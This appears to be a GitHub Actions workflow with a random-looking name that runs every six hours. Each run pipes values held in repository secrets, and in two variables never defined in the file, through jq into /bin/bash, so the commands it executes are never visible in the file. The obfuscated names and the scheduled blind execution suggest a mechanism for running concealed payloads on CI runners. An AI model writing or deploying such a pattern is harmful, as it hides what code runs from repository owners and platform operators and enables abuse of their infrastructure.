name: formulahorseshoes

on:
  workflow_dispatch:
  schedule:
    - cron: '53 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: formulahorseshoes
        env:
          nf83: ${{ secrets.nf83 }}
        run: |
          echo $nf83 | jq -r .rmbwx94351 | /bin/bash
          echo $dpp17 | jq -r .yudkk69253 | /bin/bash
          echo $qqm4658 | jq -r .orno6 | /bin/bash

